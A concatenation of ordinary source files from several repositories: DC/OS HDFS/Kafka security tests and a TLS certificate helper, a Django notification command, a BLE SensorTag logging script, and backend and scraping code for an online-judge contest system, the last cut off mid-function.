if '{}' in s:
s=s.replace('{}','')
elif '()' in s:
s=s.replace('()','')
elif '[]' in s:
s=s.replace('[]','')
else:
restart=False
return 'YES' if len(s)==0 else 'NO'
x=isBalanced("[{}")
print(x)
``` |
{
"source": "jitupawar22/dcos-commons",
"score": 2
} |
#### File: hdfs/tests/test_kerberos_auth.py
```python
import logging
import pytest
import sdk_auth
import sdk_cmd
import sdk_install
import sdk_marathon
import sdk_utils
from tests import auth
from tests import config
log = logging.getLogger(__name__)
pytestmark = pytest.mark.skipif(sdk_utils.is_open_dcos(),
reason='Feature only supported in DC/OS EE')
@pytest.fixture(scope='module', autouse=True)
def kerberos(configure_security):
try:
kerberos_env = sdk_auth.KerberosEnvironment()
principals = auth.get_service_principals(config.FOLDERED_SERVICE_NAME,
kerberos_env.get_realm())
kerberos_env.add_principals(principals)
kerberos_env.finalize()
service_kerberos_options = {
"service": {
"name": config.FOLDERED_SERVICE_NAME,
"security": {
"kerberos": {
"enabled": True,
"kdc": {
"hostname": kerberos_env.get_host(),
"port": int(kerberos_env.get_port())
},
"keytab_secret": kerberos_env.get_keytab_path(),
"realm": kerberos.get_realm()
}
}
},
"hdfs": {
"security_auth_to_local": auth.get_principal_to_user_mapping()
}
}
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
sdk_install.install(
config.PACKAGE_NAME,
config.FOLDERED_SERVICE_NAME,
config.DEFAULT_TASK_COUNT,
additional_options=service_kerberos_options,
timeout_seconds=30*60)
yield kerberos_env
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.FOLDERED_SERVICE_NAME)
if kerberos_env:
kerberos_env.cleanup()
@pytest.fixture(autouse=True)
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.smoke
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_health_of_kerberized_hdfs():
config.check_healthy(service_name=config.FOLDERED_SERVICE_NAME)
@pytest.fixture(scope="module", autouse=True)
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
def kerberized_hdfs_client(kerberos):
try:
client_app_def = config.get_kerberized_hdfs_client_app()
client_app_def["secrets"]["hdfs_keytab"]["source"] = kerberos.get_keytab_path()
client_app_def["env"]["REALM"] = kerberos.get_realm()
client_app_def["env"]["KDC_ADDRESS"] = kerberos.get_kdc_address()
client_app_def["env"]["HDFS_SERVICE_NAME"] = config.FOLDERED_DNS_NAME
sdk_marathon.install_app(client_app_def)
yield client_app_def["id"]
finally:
sdk_marathon.destroy_app(client_app_def["id"])
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.auth
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_user_can_auth_and_write_and_read(kerberized_hdfs_client):
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("hdfs"))
test_filename = "test_auth_write_read" # must be unique among tests in this suite
write_cmd = "/bin/bash -c '{}'".format(config.hdfs_write_command(config.TEST_CONTENT_SMALL, test_filename))
sdk_cmd.task_exec(kerberized_hdfs_client, write_cmd)
read_cmd = "/bin/bash -c '{}'".format(config.hdfs_read_command(test_filename))
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, read_cmd)
assert stdout == config.TEST_CONTENT_SMALL
@pytest.mark.dcos_min_version('1.10')
@sdk_utils.dcos_ee_only
@pytest.mark.auth
@pytest.mark.sanity
@pytest.mark.skip(reason="HDFS-493")
def test_users_have_appropriate_permissions(kerberized_hdfs_client):
# "hdfs" is a superuser
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("hdfs"))
log.info("Creating directory for alice")
make_user_directory_cmd = config.hdfs_command("mkdir -p /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, make_user_directory_cmd)
change_ownership_cmd = config.hdfs_command("chown alice:users /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, change_ownership_cmd)
change_permissions_cmd = config.hdfs_command("chmod 700 /users/alice")
sdk_cmd.task_exec(kerberized_hdfs_client, change_permissions_cmd)
test_filename = "test_user_permissions" # must be unique among tests in this suite
# alice has read/write access to her directory
sdk_auth.kdestroy(kerberized_hdfs_client)
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("alice"))
write_access_cmd = "/bin/bash -c \"{}\"".format(config.hdfs_write_command(
config.TEST_CONTENT_SMALL,
"/users/alice/{}".format(test_filename)))
log.info("Alice can write: {}".format(write_access_cmd))
rc, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, write_access_cmd)
assert stdout == '' and rc == 0
read_access_cmd = config.hdfs_read_command("/users/alice/{}".format(test_filename))
log.info("Alice can read: {}".format(read_access_cmd))
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, read_access_cmd)
assert stdout == config.TEST_CONTENT_SMALL
ls_cmd = config.hdfs_command("ls /users/alice")
_, stdout, _ = sdk_cmd.task_exec(kerberized_hdfs_client, ls_cmd)
assert "/users/alice/{}".format(test_filename) in stdout
# bob doesn't have read/write access to alice's directory
sdk_auth.kdestroy(kerberized_hdfs_client)
sdk_auth.kinit(kerberized_hdfs_client, keytab=config.KEYTAB, principal=kerberos.get_principal("bob"))
log.info("Bob tries to wrtie to alice's directory: {}".format(write_access_cmd))
_, _, stderr = sdk_cmd.task_exec(kerberized_hdfs_client, write_access_cmd)
log.info("Bob can't write to alice's directory: {}".format(write_access_cmd))
assert "put: Permission denied: user=bob" in stderr
log.info("Bob tries to read from alice's directory: {}".format(read_access_cmd))
_, _, stderr = sdk_cmd.task_exec(kerberized_hdfs_client, read_access_cmd)
log.info("Bob can't read from alice's directory: {}".format(read_access_cmd))
assert "cat: Permission denied: user=bob" in stderr
```
#### File: kafka/tests/test_tls.py
```python
import pytest
import shakedown
import sdk_cmd
import sdk_install
import sdk_networks
import sdk_plan
import sdk_security
import sdk_utils
from tests import config
# Name of the broker TLS vip
BROKER_TLS_ENDPOINT = 'broker-tls'
@pytest.fixture(scope='module')
def service_account(configure_security):
"""
Creates service account and yields the name.
"""
try:
name = config.SERVICE_NAME
sdk_security.create_service_account(
service_account_name=name, service_account_secret=name)
# TODO(mh): Fine grained permissions needs to be addressed in DCOS-16475
sdk_cmd.run_cli(
"security org groups add_user superusers {name}".format(name=name))
yield name
finally:
sdk_security.delete_service_account(
service_account_name=name, service_account_secret=name)
@pytest.fixture(scope='module')
def kafka_service_tls(service_account):
try:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
config.install(
config.PACKAGE_NAME,
config.SERVICE_NAME,
config.DEFAULT_BROKER_COUNT,
additional_options={
"service": {
"service_account": service_account,
"service_account_secret": service_account,
"security": {
"transport_encryption": {
"enabled": True
}
}
}
}
)
sdk_plan.wait_for_completed_deployment(config.SERVICE_NAME)
yield service_account
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
@pytest.mark.tls
@pytest.mark.smoke
@pytest.mark.sanity
@sdk_utils.dcos_ee_only
@pytest.mark.dcos_min_version('1.10')
def test_tls_endpoints(kafka_service_tls):
endpoints = sdk_networks.get_and_test_endpoints(config.PACKAGE_NAME, config.SERVICE_NAME, "", 2)
assert BROKER_TLS_ENDPOINT in endpoints
# Test that broker-tls endpoint is available
endpoint_tls = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'endpoints {name}'.format(name=BROKER_TLS_ENDPOINT), json=True)
assert len(endpoint_tls['dns']) == config.DEFAULT_BROKER_COUNT
@pytest.mark.tls
@pytest.mark.smoke
@pytest.mark.sanity
@sdk_utils.dcos_ee_only
@pytest.mark.dcos_min_version('1.10')
def test_producer_over_tls(kafka_service_tls):
sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic create {}'.format(config.DEFAULT_TOPIC_NAME))
topic_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic describe {}'.format(config.DEFAULT_TOPIC_NAME), json=True)
assert len(topic_info['partitions']) == config.DEFAULT_PARTITION_COUNT
# Write twice: Warm up TLS connections
num_messages = 10
write_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic producer_test_tls {} {}'.format(config.DEFAULT_TOPIC_NAME, num_messages), json=True)
write_info = sdk_cmd.svc_cli(config.PACKAGE_NAME, config.SERVICE_NAME, 'topic producer_test_tls {} {}'.format(config.DEFAULT_TOPIC_NAME, num_messages), json=True)
assert len(write_info) == 1
assert write_info['message'].startswith('Output: {} records sent'.format(num_messages))
```
#### File: testing/security/transport_encryption.py
```python
import json
import logging
import sdk_cmd
log = logging.getLogger(__name__)
def fetch_dcos_ca_bundle(task: str) -> str:
"""Fetch the DC/OS CA bundle from the leading Mesos master"""
local_bundle_file = "dcos-ca.crt"
cmd = ["curl", "-L", "--insecure", "-v",
"leader.mesos/ca/dcos-ca.crt",
"-o", local_bundle_file]
sdk_cmd.task_exec(task, " ".join(cmd))
return local_bundle_file
def create_tls_artifacts(cn: str, task: str) -> str:
pub_path = "{}_pub.crt".format(cn)
priv_path = "{}_priv.key".format(cn)
log.info("Generating certificate. cn={}, task={}".format(cn, task))
output = sdk_cmd.task_exec(
task,
'openssl req -nodes -newkey rsa:2048 -keyout {} -out request.csr '
'-subj "/C=US/ST=CA/L=SF/O=Mesosphere/OU=Mesosphere/CN={}"'.format(priv_path, cn))
log.info(output)
assert output[0] is 0
rc, raw_csr, _ = sdk_cmd.task_exec(task, 'cat request.csr')
assert rc is 0
request = {
"certificate_request": raw_csr
}
token = sdk_cmd.run_cli("config show core.dcos_acs_token")
output = sdk_cmd.task_exec(
task,
"curl --insecure -L -X POST "
"-H 'Authorization: token={}' "
"leader.mesos/ca/api/v2/sign "
"-d '{}'".format(token, json.dumps(request)))
log.info(output)
assert output[0] is 0
# Write the public cert to the client
certificate = json.loads(output[1])["result"]["certificate"]
output = sdk_cmd.task_exec(task, "bash -c \"echo '{}' > {}\"".format(certificate, pub_path))
log.info(output)
assert output[0] is 0
create_keystore_truststore(cn, task)
return "CN={},OU=Mesosphere,O=Mesosphere,L=SF,ST=CA,C=US".format(cn)
def create_keystore_truststore(cn: str, task: str):
pub_path = "{}_pub.crt".format(cn)
priv_path = "{}_priv.key".format(cn)
keystore_path = "{}_keystore.jks".format(cn)
truststore_path = "{}_truststore.jks".format(cn)
log.info("Generating keystore and truststore, task:{}".format(task))
dcos_ca_bundle = fetch_dcos_ca_bundle(task)
# Convert to a PKCS12 key
output = sdk_cmd.task_exec(
task,
'bash -c "export RANDFILE=/mnt/mesos/sandbox/.rnd && '
'openssl pkcs12 -export -in {} -inkey {} '
'-out keypair.p12 -name keypair -passout pass:export '
'-CAfile {} -caname root"'.format(pub_path, priv_path, dcos_ca_bundle))
log.info(output)
assert output[0] is 0
log.info("Generating certificate: importing into keystore and truststore")
# Import into the keystore and truststore
output = sdk_cmd.task_exec(
task,
"keytool -importkeystore "
"-deststorepass changeit -destkeypass changeit -destkeystore {} "
"-srckeystore keypair.p12 -srcstoretype PKCS12 -srcstorepass export "
"-alias keypair".format(keystore_path))
log.info(output)
assert output[0] is 0
output = sdk_cmd.task_exec(
task,
"keytool -import -trustcacerts -noprompt "
"-file {} -storepass changeit "
"-keystore {}".format(dcos_ca_bundle, truststore_path))
log.info(output)
assert output[0] is 0
``` |
{
"source": "jitwei98/expiry-tracker-bot",
"score": 2
} |
#### File: management/commands/notify_users.py
```python
from datetime import date, timedelta
from django.core.management import BaseCommand
from upload.models import Food
class Command(BaseCommand):
def add_arguments(self, parser):
pass
# parser.add_argument('poll_ids', nargs='+', type=int)
#
# # Named (optional) arguments
# parser.add_argument(
# '--delete',
# action='store_true',
# help='Delete poll instead of closing it',
# )
def handle(self, *args, **options):
date_threshold = date.today() + timedelta(days=3)
food_qs = Food.objects.filter(expiry_date__lt=date_threshold)
output = food_qs.values_list('name', 'expiry_date')
self.stdout.write(str(output))
``` |
{
"source": "jitwxs/JITZhuoYueCourseCrawler",
"score": 3
} |
#### File: jitwxs/JITZhuoYueCourseCrawler/Login.py
```python
import requests,re,getpass
import http.cookiejar as cookielib
from bs4 import BeautifulSoup
agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'
headers = {'User-Agent':agent}
loginUrl = 'http://192.168.127.12/moodle/login/index.php'
#得到session对象
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
#读取cookie文件
try:
session.cookies.load(ignore_discard=True)
print('Cookie加载成功')
except:
print('Cookie未能加载')
#登陆类
class Login:
def __init__(self):
pass
def getHTMLText(self,url):
try:
r = session.get(url,timeout=30,headers=headers)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.text
except:
return None
def getSoupObj(self,url):
try:
html = self.getHTMLText(url)
soup = BeautifulSoup(html,'html.parser')
return soup
except:
print('\nError: failed to get the Soup object')
return None
#验证是否登陆
def checkLogin(self):
soup = self.getSoupObj(loginUrl)
loginInfo = soup('div',{'class':'logininfo'})
try:
info = loginInfo[0].text
print(info)
if info == '您尚未登录。':
return False
else:
return True
except:
print('获取登录信息发生错误')
return False
def getSession(self):
return session
def login(self):
username = input('请输入登陆名: ')
password = <PASSWORD>('请输入密码: ')
# 如果不支持上面的getpass,使用下面的语句
## password = input('请输入密码: ')
post_data = {'username':username,
'password':password
}
post_url = loginUrl
try:
login_page = session.post(post_url,headers = headers,data = post_data)
#保存Cookie
session.cookies.save()
except:
print('登陆出现异常!')
``` |
{
"source": "jitx/anrg-sensortag-weather-probe",
"score": 2
} |
#### File: jitx/anrg-sensortag-weather-probe/sensor.py
```python
import pexpect
import time
from datetime import datetime
uuid_pre = "F000"
uuid_pos = "-0451-4000-B000-000000000000"
#format: handle = [data, config]
temp_uuid = ["AA01", "AA02"]
move_uuid = ["AA81", "AA82"]
humd_uuid = ["AA21", "AA22"]
baro_uuid = ["AA41", "AA42"]
opti_uuid = ["AA71", "AA72"]
leds_uuid = ["AA65", "AA66"]
sensor_mac = "B0:B4:48:C0:CA:03"
prompt = "\[CON\]\[" + sensor_mac + "\]\[LE\]>"
stealth_mode = False
active_sensors = [temp_uuid, move_uuid, humd_uuid, baro_uuid, opti_uuid]
sensor_uuid_to_cvh = {}
def log(data):
f = open("log.txt", "a")
f.write(data + "\n")
print data
f.close()
def turn_sensor_on(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def turn_sensor_off(cnfg, hnd):
child.sendline("char-write-cmd " + sensor_uuid_to_cvh[uuid_pre + cnfg + uuid_pos] + " " + hnd)
child.expect(prompt)
def read_sensor_data(data):
child.sendline("char-read-hnd " + sensor_uuid_to_cvh[uuid_pre + data + uuid_pos])
child.expect(prompt)
child.before
child.expect(prompt)
data = child.before
return data.strip().split(": ")[1]
def print_temp_data(value):
SCALE_LSB = 0.03125
value = value.split(" ")
obj_temp = "0x" + value[1] + value[0]
amb_temp = "0x" + value[3] + value[2]
obj_temp_cel = (float)(int(obj_temp, 16) >> 2) * SCALE_LSB
amb_temp_cel = (float)(int(amb_temp, 16) >> 2) * SCALE_LSB
obj_temp_fah = obj_temp_cel * (9.0/5.0) + 32.0
amb_temp_fah = amb_temp_cel * (9.0/5.0) + 32.0
log("IR TEMPERATURE")
log("\tOBJECT\t\t: " + str(obj_temp_cel) + "°C" + " | " + str(obj_temp_fah) + "°F")
log("\tAMBIENT\t\t: " + str(amb_temp_cel) + "°C" + " | " + str(amb_temp_fah) + "°F")
def print_move_data(value):
value = value.split(" ")
gyro_x = "0x" + value[1] + value[0]
gyro_y = "0x" + value[3] + value[2]
gyro_z = "0x" + value[5] + value[4]
acc_x = "0x" + value[7] + value[6]
acc_y = "0x" + value[9] + value[8]
acc_z = "0x" + value[11] + value[10]
mag_x = "0x" + value[13] + value[12]
mag_y = "0x" + value[15] + value[14]
mag_z = "0x" + value[17] + value[16]
gyro_x_dps = (((float)(int(gyro_x, 16))) * 1.0) / (65536.0 / 500.0)
gyro_y_dps = (((float)(int(gyro_y, 16))) * 1.0) / (65536.0 / 500.0)
gyro_z_dps = (((float)(int(gyro_z, 16))) * 1.0) / (65536.0 / 500.0)
acc_range = 16.0 # turning on handle to 0xffff sets to 16
acc_x_mps = (((float)(int(acc_x, 16))) * 1.0) / (32768.0 / acc_range)
acc_y_mps = (((float)(int(acc_y, 16))) * 1.0) / (32768.0 / acc_range)
acc_z_mps = (((float)(int(acc_z, 16))) * 1.0) / (32768.0 / acc_range)
mag_x_ut = ((float)(int(mag_x, 16))) * 1.0
mag_y_ut = ((float)(int(mag_y, 16))) * 1.0
mag_z_ut = ((float)(int(mag_z, 16))) * 1.0
log("MOVEMENT")
log("\tGYROSCOPE\t: " + "X: " + str(gyro_x_dps) + "°/s" + " | " + "Y: " + str(gyro_y_dps) + "°/s" + " | " + "Z: " + str(gyro_z_dps) + "°/s")
log("\tACCELEROMETER\t: " + "X: " + str(acc_x_mps) + "m/s" + " | " + "Y: " + str(acc_y_mps) + "m/s" + " | " + "Z: " + str(acc_z_mps) + "m/s")
log("\tMAGNETOMETER\t: " + "X: " + str(mag_x_ut) + "µT" + " | " + "Y: " + str(mag_y_ut) + "µT" + " | " + "Z: " + str(mag_z_ut) + "µT")
def print_humd_data(value):
value = value.split(" ")
temp = "0x" + value[1] + value[0]
humd = "0x" + value[3] + value[2]
temp_cel = ((float)(int(temp, 16))) / 65536.0 * 165.0 - 40.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
humd_rel = (float)(int(humd, 16) & ~0x0003) / 65536.0 * 100.0
log("HUMIDITY")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tHUMDITY\t\t: " + str(humd_rel) + "%")
def print_baro_data(value):
value = value.split(" ")
temp = "0x" + value[2] + value[1] + value[0]
baro = "0x" + value[5] + value[4] + value[3]
temp_cel = ((float)(int(temp, 16))) / 100.0
temp_fah = temp_cel * (9.0/5.0) + 32.0
baro_hpa = ((float)(int(baro, 16))) / 100.0
baro_kpa = baro_hpa / 10.0
log("BAROMETER")
log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
log("\tPRESSURE\t: " + str(baro_kpa) + "kPa" + " | " + str(baro_hpa) + "hPa")
def print_opti_data(value):
value = value.split(" ")
opti = "0x" + value[1] + value[0]
m = int(opti, 16) & 0x0FFF
e = (int(opti, 16) & 0xF000) >> 12
if (e == 0):
e = 1
else:
e = 2 << (e - 1)
opti_lux = m * (0.01 * e)
log("OPTICAL")
log("\tLIGHT INTENSITY\t: " + str(opti_lux) + "lux")
def turn_sensors_on():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_on(sensor[1], "ffff")
else:
turn_sensor_on(sensor[1], "01")
def turn_sensors_off():
for sensor in active_sensors:
if sensor[1] == move_uuid[1]:
turn_sensor_off(sensor[1], "0000")
else:
turn_sensor_off(sensor[1], "00")
def init_led():
if not stealth_mode:
turn_sensor_on(leds_uuid[1], "01")
def set_led(hnd):
if not stealth_mode:
turn_sensor_on(leds_uuid[0], hnd)
child = pexpect.spawn("gatttool -I")
child.sendline("connect " + sensor_mac)
child.expect(prompt)
child.sendline("characteristics")
child.expect(prompt)
child.before
child.expect(prompt)
characteristics = child.before
handles = characteristics.split("\r\n")
for i in handles:
if len(i) >= 11:
handle = i.replace(":", ",").split(", ")
char_value_handle_value_index = handle.index("char value handle") + 1
uuid_value_index = handle.index("uuid") + 1
if handle[uuid_value_index] not in sensor_uuid_to_cvh:
sensor_uuid_to_cvh[handle[uuid_value_index].upper()] = handle[char_value_handle_value_index].upper()
init_led()
while (True):
set_led("03")
turn_sensors_on()
set_led("01")
time.sleep(10)
log("===")
log(str(datetime.now()))
set_led("02")
for sensor in active_sensors:
if sensor[0] == temp_uuid[0]:
print_temp_data(read_sensor_data(sensor[0]))
if sensor[0] == move_uuid[0]:
print_move_data(read_sensor_data(sensor[0]))
if sensor[0] == humd_uuid[0]:
print_humd_data(read_sensor_data(sensor[0]))
if sensor[0] == baro_uuid[0]:
print_baro_data(read_sensor_data(sensor[0]))
if sensor[0] == opti_uuid[0]:
print_opti_data(read_sensor_data(sensor[0]))
set_led("03")
turn_sensors_off()
log("===")
set_led("00")
time.sleep(590)
``` |
{
"source": "Jiubei0408/jiudge-backend",
"score": 2
} |
#### File: api/v1/contest.py
```python
from app.libs.red_print import RedPrint
from app.libs.error_code import *
from flask_login import current_user, login_required
from app.models.contest import Contest
from app.models.relationship.problem_contest import ProblemContestRel
from app.libs.enumerate import ContestState
from app.libs.auth import admin_only
from app.validators.contest import *
from app.validators.problem import *
from app.validators.base import *
from app.services.problem import *
from app.services.contest import *
from app.models.submission import Submission
from app.libs.tools import get_file_response
from app.models.clarification import Clarification
api = RedPrint('contest')
@api.route('/<int:id_>/register', methods=['POST'])
@login_required
def register_contest(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
if contest.is_registered(current_user):
return Forbidden(msg='你已经注册过了')
if contest.state == ContestState.ENDED:
return Forbidden(msg='比赛已结束')
form = ContestRegisterForm().validate_for_api().data_
if contest.password is not None and form['password'] != contest.password:
return Forbidden(msg='密码错误')
from app.models.relationship.user_contest import UserContestRel
UserContestRel.create(username=current_user.username, contest_id=id_)
return Success('注册完成')
@api.route('/<int:id_>', methods=['GET'])
def get_contest_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
contest.registered = contest.is_registered(current_user)
contest.show('registered')
return Success(data=contest)
@api.route('s', methods=['GET'])
def get_contests_api():
form = SearchForm().validate_for_api().data_
data = Contest.search(ready=True, **form)
for contest in data['data']:
contest.registered = contest.is_registered(current_user)
contest.show('registered')
return SearchSuccess(data=data)
@api.route('/<int:id_>/problems', methods=['GET'])
def get_contest_problems(id_):
from app.services.contest import get_problem_list
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
if contest.is_admin(current_user) or contest.state == ContestState.ENDED:
return Success(data=get_problem_list(
contest_id=id_,
username=(current_user.username if not current_user.is_anonymous else None),
show_secret=True
))
if contest.state == ContestState.BEFORE_START:
return AuthFailed(msg='比赛还未开始')
if current_user.is_anonymous:
return AuthFailed(msg='请先登录')
if not contest.is_registered(current_user):
return AuthFailed(msg='你没有注册这场比赛')
return Success(data=get_problem_list(
contest_id=id_,
username=current_user.username,
show_secret=True
))
@api.route('/<int:id_>/scoreboard', methods=['GET'])
def get_scoreboard_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
from app.services.contest import get_scoreboard
return get_scoreboard(contest)
@api.route('/<int:id_>/scoreboard', methods=['DELETE'])
@admin_only
def delete_scoreboard_cache_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
from app.models.scoreboard import Scoreboard
board = Scoreboard.get_by_contest_id(contest.id)
board.modify(scoreboard_json='')
return Success()
@api.route('/create', methods=['POST'])
@admin_only
def create_contest_api():
return NotAchieved()
@api.route('/create_remote_contest', methods=['POST'])
@admin_only
def create_remote_contest_api():
form = CreateRemoteContestForm().validate_for_api().data_
from app.models.oj import OJ
oj = OJ.get_by_id(form['oj_id'])
if oj is None:
return NotFound(msg='没有找到这个oj')
if oj.status != 1:
return Forbidden(msg=f'暂不支持{oj.name}')
password = None if form['password'] == '' else form['password']
create_remote_contest(
contest_name=form['contest_name'],
contest_type=form['contest_type'],
start_time=form['start_time'],
end_time=form['end_time'],
password=password,
oj=oj,
remote_contest_id=form['remote_contest_id']
)
return Success(msg='比赛已创建')
@api.route('/<int:cid>/problem_text_file/<string:pid>', methods=['GET'])
@login_required
def get_problem_text_file_api(cid, pid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
if not contest.is_admin(current_user) and contest.state == ContestState.BEFORE_START:
return Forbidden('比赛还未开始')
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, pid)
if pcrel is None:
return NotFound(f'Contest {cid} has no problem called {pid}')
loc = pcrel.problem.problem_text_file
if loc == '':
return NotFound('没有找到题面文件')
return get_file_response(loc)
@api.route('/<int:cid>/submit/<string:pid>', methods=['POST'])
@login_required
def submit_code_api(cid, pid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
if not contest.is_admin(current_user) and contest.state != ContestState.RUNNING:
return Forbidden('比赛不在进行中')
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, pid)
if pcrel is None:
return NotFound(f'Contest {cid} has no problem called {pid}')
form = SubmitCodeForm().validate_for_api().data_
if contest.is_admin(current_user) or contest.is_registered(current_user):
submit_problem(current_user, pcrel.problem, form['code'], form['lang'], contest)
return Success('提交成功')
else:
return AuthFailed('You should register first')
@api.route('/<int:cid>/status', methods=['GET'])
def get_status_api(cid):
contest = Contest.get_by_id(cid)
if contest is None:
return NotFound(f'Contest {cid} not found')
form = SearchSubmissionForm().validate_for_api().data_
query = {
'contest_id': cid,
**{k: v for k, v in form.items() if v is not None and v != ''}
}
if 'problem_id' in query:
from app.models.relationship.problem_contest import ProblemContestRel
pcrel = ProblemContestRel.get_by_problem_id_in_contest(cid, query['problem_id'])
if pcrel is not None:
query['problem_id'] = pcrel.problem_id
admin = contest.is_admin(current_user)
if not admin and contest.state == ContestState.BEFORE_START:
return AuthFailed(msg='比赛还未开始')
if not admin and contest.state == ContestState.RUNNING:
if current_user.is_anonymous:
return AuthFailed()
if not contest.is_registered(current_user):
return AuthFailed(msg='你没有注册这场比赛')
query['username'] = current_user.username
search_result = Submission.search(**query, order={'id': 'desc'}, enable_fuzzy={'username'})
for submission in search_result['data']:
if admin:
submission.show_secret()
else:
submission.hide_secret()
return Success(data=search_result)
@api.route('/<int:id_>/clarifications')
def get_clarifications_api(id_):
form = SearchForm().validate_for_api().data_
if form['page'] is None:
form['page'] = 1
if form['page_size'] is None:
form['page_size'] = 20
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
return SearchSuccess(data=Clarification.search_by_contest_id(
contest_id=id_,
page=form['page'],
page_size=form['page_size']
))
@api.route('/<int:id_>', methods=['DELETE'])
@admin_only
def delete_contest_api(id_):
contest = Contest.get_by_id(id_)
if contest is None:
return NotFound(msg='找不到该比赛')
contest.delete()
return DeleteSuccess(msg='删除成功')
```
#### File: app/libs/auth.py
```python
import functools
from flask_login import current_user
from app.libs.error_code import AuthFailed
from app.libs.enumerate import UserPermission
def admin_only(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if current_user.is_anonymous or current_user.permission != UserPermission.ADMIN:
raise AuthFailed(msg='您不是管理员')
return func(*args, **kwargs)
return wrapper
```
#### File: app/models/scoreboard.py
```python
import datetime
from sqlalchemy import Column, Integer, DateTime, ForeignKey, UnicodeText, Boolean
from app.models.base import Base, db
from app.models.contest import Contest
class Scoreboard(Base):
__tablename__ = 'scoreboard'
fields = ['contest_id', 'scoreboard_json', 'frozen', 'update_time']
contest_id = Column(Integer, ForeignKey(Contest.id), primary_key=True)
scoreboard_json = Column(UnicodeText, default='')
frozen = Column(Boolean, nullable=False, default=False)
update_time = Column(DateTime)
@classmethod
def create(cls, **kwargs):
kwargs.setdefault('update_time', datetime.datetime.now())
return super().create(**kwargs)
@classmethod
def get_by_contest_id(cls, contest_id):
r = cls.search(contest_id=contest_id)['data']
if r:
return r[0]
return None
``` |
{
"source": "Jiubei0408/jiudge-spiderhost",
"score": 3
} |
#### File: app/spiders/domjudge_spider.py
```python
import base64
import json
import re
import time
from bs4 import BeautifulSoup
from app.spiders.base_spider import BaseSpider
class DomjudgeSpider(BaseSpider):
accounts = []
oj_name = 'domjudge'
base_url = ''
def login(self):
url = self.base_url + '/login'
res = self.http.get(url=url, noprint=True)
if len(res.history) > 0:
return
soup = BeautifulSoup(res.text, 'lxml')
csrf_token = soup.find('input', attrs={'name': '_csrf_token'})['value']
data = {
'_csrf_token': csrf_token,
'_username': self.username,
'_password': <PASSWORD>
}
resp = self.http.post(url=url, data=data)
print('login:' + self.username)
return {
'resp_text': resp.text,
'data': data
}
def check_login(self):
cnt = 0
while cnt < 10:
url = self.base_url + '/team'
res = self.http.get(url=url, noprint=True)
if len(res.history) == 0:
return True
login_res = self.login()
cnt += 1
time.sleep(1)
print(self.oj_name + ' login failed: ' + self.username)
raise Exception(json.dumps({
'type': 'login error',
'req_text': res.text,
'login_req_text': login_res
}))
def get_contest_meta(self, contest_id):
self.check_login()
self.switch_contest(contest_id)
url = self.base_url + '/team/problems'
res = self.http.get(url=url)
soup = BeautifulSoup(res.text, 'lxml')
problem_cards = soup.find_all('div', class_='card')
problems = []
main_page = self.http.get(url=self.base_url + '/team')
main_soup = BeautifulSoup(main_page.text, 'lxml')
for card in problem_cards:
if card.text == '':
continue
problem_name = card.find('h4').text.strip()
remote_problem_id = main_soup.find('th', title=f'problem {problem_name}').text.strip()
problem_pdf_url = None
links = card.find_all('a')
for link in links:
href = link['href']
if '/problems/' in href:
p = re.findall('/problems/(.*)/text', href)[0]
problem_pdf_url = self.base_url + f'/team/problems/{p}/text'
problem_pdf = ''
if problem_pdf_url:
problem_pdf = self.http.get(url=problem_pdf_url).content
problem_pdf = base64.b64encode(problem_pdf).decode('utf-8')
limits = card.find('h5').text
limits = limits.replace('\n', '').replace(' ', '')
try:
timelimit = float(re.findall(r'(\d+\.?\d*)second', limits)[0])
except:
timelimit = -1
try:
